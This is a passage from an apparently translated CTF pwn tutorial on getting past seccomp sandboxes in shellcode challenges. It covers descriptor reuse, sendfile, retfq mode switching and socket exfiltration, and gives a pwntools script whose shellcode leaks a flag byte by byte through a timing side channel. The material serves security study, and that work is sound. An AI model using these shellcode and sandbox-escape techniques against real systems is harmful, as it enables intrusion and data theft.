    if (munmap(mapped, sb.st_size) == -1) {
        perror("munmap");
        exit(EXIT_FAILURE);
    }

    return 0;
}

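If the first argument of read is restricted to 0/1/2

Close the corresponding fd with close, then open the file. open returns the lowest unused descriptor, so the flag file takes over that number.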
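The trick relies on open handing out the lowest free descriptor number. The sketch below demonstrates that rule on a scratch descriptor rather than on stdin, so it is safe to run anywhere; `reopen_on_lowest_fd` is a made-up helper name, and a single-threaded process is assumed.

```python
import os
import tempfile


def reopen_on_lowest_fd(path_a, path_b):
    """Open path_a, close it, open path_b, and return both descriptor numbers."""
    first = os.open(path_a, os.O_RDONLY)
    os.close(first)                        # frees the number again
    second = os.open(path_b, os.O_RDONLY)  # lowest free number is reused
    os.close(second)
    return first, second
```

In an exploit the same effect is obtained with close(0) followed by open("flag", 0), after which read(0, buf, n) passes a filter that only accepts fd 0, 1, or 2.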

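The sendfile system call

sendfile is effectively read and write combined in one system call.

ssize_t sendfile(int out_fd, int in_fd, off_t *offset, size_t count);

int out_fd: the output file descriptor

int in_fd: the input file descriptor

off_t *offset: a pointer to an off_t that gives the position in the input file where reading starts. If the pointer is NULL, reading starts at the current file offset. If it is not NULL, the value it points to is updated to the new offset after the call.

size_t count: the number of bytes to send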
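As a rough illustration of the parameters listed above, Python exposes the same call as `os.sendfile(out_fd, in_fd, offset, count)`. The helper `sendfile_to_fd` and the 0x100 default count are assumptions of this sketch.

```python
import os
import tempfile


def sendfile_to_fd(path, out_fd, count=0x100):
    """Copy up to `count` bytes from the start of `path` to `out_fd`."""
    in_fd = os.open(path, os.O_RDONLY)
    try:
        # offset 0: start at the beginning of the input file
        return os.sendfile(out_fd, in_fd, 0, count)
    finally:
        os.close(in_fd)
```

`sendfile_to_fd("flag", 1)` would print the file to standard output without ever calling read or write; in shellcode this is a single system call with out_fd=1 and in_fd set to the descriptor returned by open.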

Brute-forcing without write

If every usable way of writing is disabled,

a side channel can be used to brute-force the flag one byte at a time.

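from pwn import *
import time

context.arch = 'amd64'  # asm() below must assemble 64-bit code

def pwn():
    global s
    flag = ''
    count = 1
    for i in range(len(flag), 0x50):
        # binary search over the printable ASCII range for byte i of the flag
        left = 32
        right = 127
        while left < right:
            s = process('./ezshell')
            # s = remote('node2.hackingfor.fun', 38235)
            getshellcode()  # challenge-specific setup, defined elsewhere in the exploit
            mid = (left + right) >> 1
            # open("./flag"), read it onto the stack, then spin forever if flag[i] > mid
            orw_shellcode = f'''
                mov rdi, 0x67616c662f2e
                push rdi
                mov rdi, rsp
                mov rsi, 0
                mov rdx, 0
                mov rax, 2
                syscall
                mov rdi, 3
                mov rsi, rsp
                mov rdx, 0x100
                mov rax, 0
                syscall
                mov dl, byte ptr [rsp+{i}]
                mov cl, {mid}
                cmp dl, cl
                ja loop
                ret
                loop:
                jmp loop
            '''
            s.sendline(asm(orw_shellcode))
            start_time = time.time()
            try:
                s.recv(timeout=0.2)
                # still alive after the timeout: the shellcode is looping, so flag[i] > mid
                if(time.time() - start_time > 0.1):
                    left = mid + 1
            except:
                # connection closed early: the shellcode returned, so flag[i] <= mid
                right = mid
            s.close()
            log.info('time-->' + str(count))
            log.info(flag)
            count += 1
        flag += chr(left)
        log.info(flag)
        if(flag[-1] == '}'):
            break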
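The search logic of the script can be separated from the exploit and tested on its own. In the sketch below the timing measurement is replaced by an `oracle(i, mid)` callback that answers whether byte i of the flag is greater than mid; both function names and the callback shape are inventions of this example, not part of the original exploit.

```python
def recover_byte(is_greater, low=32, high=127):
    """Binary search for one byte using only 'byte > mid' answers."""
    while low < high:
        mid = (low + high) >> 1
        if is_greater(mid):
            low = mid + 1      # byte is above mid
        else:
            high = mid         # byte is mid or below
    return low


def recover_flag(oracle, max_len=0x50):
    """Recover the flag byte by byte, stopping at the closing brace."""
    flag = ""
    for index in range(max_len):
        char = chr(recover_byte(lambda mid: oracle(index, mid)))
        flag += char
        if char == "}":
            break
    return flag
```

Each byte needs at most 7 oracle queries, which is why the real exploit can afford to start a fresh process per query.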

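Bypassing by changing the cs register

retf/retfq is a far return instruction, equivalent to pop ip; pop cs. It can usually be found in libc. The reason it can change the mode the program runs in is that it modifies the cs segment register.

cs is the code segment register, which refers to the memory segment that holds code. In 8086 real mode, an instruction address cs:ip is computed as cs * 16 + ip. In 32-bit protected mode the CPU address bus and general-purpose registers are 32 bits wide and can address 4 GB of memory directly, so the segment registers were given a new job: holding a segment selector, which is an index to a segment descriptor.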

                +--------------------------------------+
                |         index                 |T|    |
                |                               |I|RPL |
                +--------------------------------^--^--+
                                                 |  |
                   Table indicator+--------------+  |
                     0 GDT                          |
                     1 LDT                          |
                  Request Privilege Level+----------+

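The low two bits of the segment selector hold the privilege level 0-3, the third bit (bit 2) says whether the descriptor is in the GDT or the LDT, and the high 13 bits are the index. The segment descriptor itself holds more parameters of the segment, including its base address, granularity, attributes, and mode.

Take switching from 64-bit mode to 32-bit mode as an example. To switch modes we need a suitable segment selector that points to a 32-bit segment descriptor in the GDT.

On Linux x86_64, 0x23 is the selector of a 32-bit code segment (in the GDT) and 0x33 is the selector of a 64-bit long mode code segment. So to switch modes it is enough to use retf/retfq to change cs from 0x33 to 0x23.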
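The two selector values can be decoded by hand with the bit layout shown in the diagram. A small sketch (the function name `decode_selector` is just for illustration):

```python
def decode_selector(selector):
    """Split a 16-bit segment selector into index, table indicator, and RPL."""
    return {
        "index": selector >> 3,                       # high 13 bits
        "table": "LDT" if selector & 0b100 else "GDT",  # bit 2
        "rpl": selector & 0b11,                       # low 2 bits
    }
```

Both selectors use the GDT at privilege level 3; 0x23 refers to descriptor 4 and 0x33 to descriptor 6.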

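Also note that after the switch from 64-bit to 32-bit, the general-purpose registers are used differently: only the low 4 bytes of the original 8 are used. This matters most for the stack pointer: esp is the low 4 bytes of rsp. rsp originally held a valid stack address, but the low 4 bytes of that address most likely point to inaccessible memory. So before executing retf/retfq a stack pivot is needed, which can be done by controlling rbp through ROP and then executing two consecutive leave instructions.

On Linux, apart from FS and GS, which need a segment base for accessing TLS, the segment descriptors of all other segment registers have a base of 0, so offsets are used directly as absolute addresses. As long as the instruction pointer is set correctly, control flow is not lost during the mode switch.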

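Bypassing write with sockets

If the target machine has outbound network access, socket system calls can be used to get around the restriction on write.

Sending: sendto, sendmsg, sendmmsg
Receiving: recvfrom, recvmsg, recvmmsg

sendto can send data directly; the other two need the data wrapped in a msg message structure.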
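To get a feel for the message-based calls, the sketch below pushes data through `sendmsg` and `recvmsg` using Python's socket module. A local socket pair stands in for the outbound network connection an exploit would use, and the function name `exfiltrate_over_socket` is hypothetical.

```python
import socket


def exfiltrate_over_socket(data):
    """Send `data` with sendmsg and read it back with recvmsg."""
    sender, receiver = socket.socketpair()
    try:
        # sendmsg takes a list of buffers, like the iovec array in struct msghdr
        sender.sendmsg([data])
        received, _ancillary, _flags, _address = receiver.recvmsg(len(data))
        return received
    finally:
        sender.close()
        receiver.close()
```

In shellcode the extra work compared with sendto is building the msghdr and iovec structures in memory before the system call.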

A substitute for mprotect

pkey_mprotect achieves roughly the same effect as mprotect.

However, memory protection keys require CPU support.